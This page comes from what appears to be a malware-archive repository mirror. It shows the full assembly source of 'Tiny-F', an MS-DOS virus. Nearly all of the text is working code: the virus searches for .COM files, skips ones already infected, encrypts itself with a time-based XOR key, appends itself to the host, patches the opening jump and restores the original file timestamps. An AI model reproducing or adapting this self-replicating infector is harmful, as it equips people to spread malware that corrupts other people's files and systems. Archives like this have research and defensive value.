ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
6332d7096f
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.tiny-f.asm
vxunderground 3e7d2e8262
Add files via upload
2021-01-12 18:01:59 -06:00

183 lines
7.5 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

tinyv SEGMENT BYTE PUBLIC 'code'
ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv
ORG 100h
DOS EQU 21h
start: JMP pgstart
exlbl: db 0CDh, 20h, 7, 8, 9
pgstart:CALL tinyvir
tinyvir:
POP SI ; get SI for storage
SUB SI,offset tinyvir ; reset SI to virus start
MOV BP,[SI+blnkdat] ; store SI in BP for return
ADD BP, OFFSET exlbl
CALL endecrpt
JMP SHORT realprog
;-----------------------------------------------------------------------------
; nonencrypted subroutines start here
;-----------------------------------------------------------------------------
; PCM's encryption was stupid, mine is better - Dark Angel
endecrpt:
; Only need to save necessary registers - Dark Angel
PUSH AX ; store registers
PUSH BX
PUSH CX
PUSH SI
; New, better, more compact encryption engine
MOV BX, [SI+EN_VAL]
ADD SI, offset realprog
MOV CX, endenc - realprog
SHR CX, 1
JNC start_encryption
DEC SI
start_encryption:
MOV DI, SI
encloop:
LODSW ; DS:[SI] -> AX
XOR AX, BX
STOSW
LOOP encloop
POP SI ; restore registers
POP CX
POP BX
POP AX
RET
;-----end of encryption routine
nfect:
CALL endecrpt
MOV [SI+offset endprog+3],AX; point to data
MOV AH,40H ; write instruction
LEA DX,[SI+0105H] ; write buffer loc |
MOV CX,offset endprog-105h ; (size of virus) --\|/--
INT DOS ; do it!
PUSHF
CALL endecrpt
POPF
JC outa1 ; error, bug out
RET
outa1:
JMP exit
;-----------------------------------------------------------------------------
; Unencrypted routines end here
;-----------------------------------------------------------------------------
realprog:
CLD ; forward direction for string ops
; Why save DTA? This part killed. Saves quite a few bytes. Dark Angel
; Instead, set DTA to SI+ENDPROG+131h
MOV AH, 1Ah ; Set DTA
LEA DX, [SI+ENDPROG+131h] ; to DS:DX
INT 21h
LEA DX,[SI+fspec] ; get filespec (*.COM)
XOR CX, CX ; || (clear regs)
MOV AH,4EH ; || (find files)
mainloop: ; \||/
INT DOS ; ----\/----
JC hiccup ; no more files found, terminate virus
; Next part had to be changed to account for new DTA address - Dark Angel
LEA DX, [SI+ENDPROG+131h+30]; set file name pointer
; (offset 30 is DTA filename start)
MOV AX,3D02H ; open file
INT DOS ; do it!
MOV BX,AX ; move file handle to BX
MOV AH,3FH ; read file
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
MOV DI,DX ; set Dest Index to area for buffer
MOV CX,0003H ; read 3 bytes
INT DOS ; do it!
CMP BYTE PTR [DI],0E9H ; check for JMP at start
JE infect ; If begins w/JMP, Infect
nextfile:
MOV AH,4FH ; set int 21 to find next file
JMP mainloop ; next file, do it!
hiccup: JMP exit
infect:
MOV AX,5700h ; get date function
INT DOS ; do it!
PUSH DX ; store date + time
PUSH CX
MOV DX,[DI+01H] ; set # of bytes to move
MOV [SI+blnkdat],DX ; " " " " " "
; Tighter Code here - Dark Angel
XOR CX,CX ; " " " " " " (0 here)
MOV AX,4200H ; move file
INT DOS ; do it!
MOV DX,DI ; set dest index to area for buffer
MOV CX,0002H ; two bytes
MOV AH,3FH ; read file
INT DOS ; do it!
CMP WORD PTR [DI],0807H ; check for infection
JE nextfile ; next file if infected
getaval: ; encryption routine starts here
; My modifications here - Dark Angel
MOV AH, 2Ch ; DOS get TIME function
INT DOS ; do it!
OR DX, DX ; Is it 0?
JE getaval ; yeah, try again
MOV word ptr [si+offset en_val], DX ; Store it
; Tighter code here - Dark Angel
XOR DX,DX ; clear regs
XOR CX,CX ; " "
MOV AX,4202H ; move file pointer
INT DOS ; do it!
OR DX,DX ; new pointer location 0?
JNE nextfile ; if no then next file
CMP AH,0FEH ; new pointer loc too high?
JNC nextfile ; yes, try again
CALL nfect
MOV AX,4200H ; move pointer
XOR CX, CX ; clear reg
MOV DX,OFFSET 00001 ; where to set pointer
INT DOS ; do it!
MOV AH,40H ; write to file
LEA DX,[SI+offset endprog+3]; write data at SI+BUFFER
MOV CX,0002H ; two bytes (the JMP)
INT DOS ; do it!
MOV AX,5701h ; store date
POP CX ; restore time
POP DX ; restore date
INT DOS ; do it!
exit:
MOV AH,3EH ; close file
INT DOS ; do it!
; Return DTA to old position - Dark Angel
MOV AH, 1Ah ; Set DTA
MOV DX, 80h ; to PSP DTA
INT 21h
JMP BP
;-----------------------------------------------------------------------------
; encrypted data goes here
;-----------------------------------------------------------------------------
fspec LABEL WORD
DB '*.COM',0
nondata DB 'Tiny-F version 1.1' ; Program identification
DB '<15><><EFBFBD>@&<><EEB7B3>' ; author identification
DB 'Released 10-19-91' ; release date
endenc LABEL BYTE ; end of encryption zone
;-----------------------------------------------------------------------------
; nonencrypted data goes anywhere after here
;-----------------------------------------------------------------------------
blnkdat LABEL WORD
DW 0000H
; Only en_val is needed now because of new encryption mechanism
en_val DW 0h
endprog LABEL WORD
tinyv ENDS
END start
Reference in New Issue View Git Blame Copy Permalink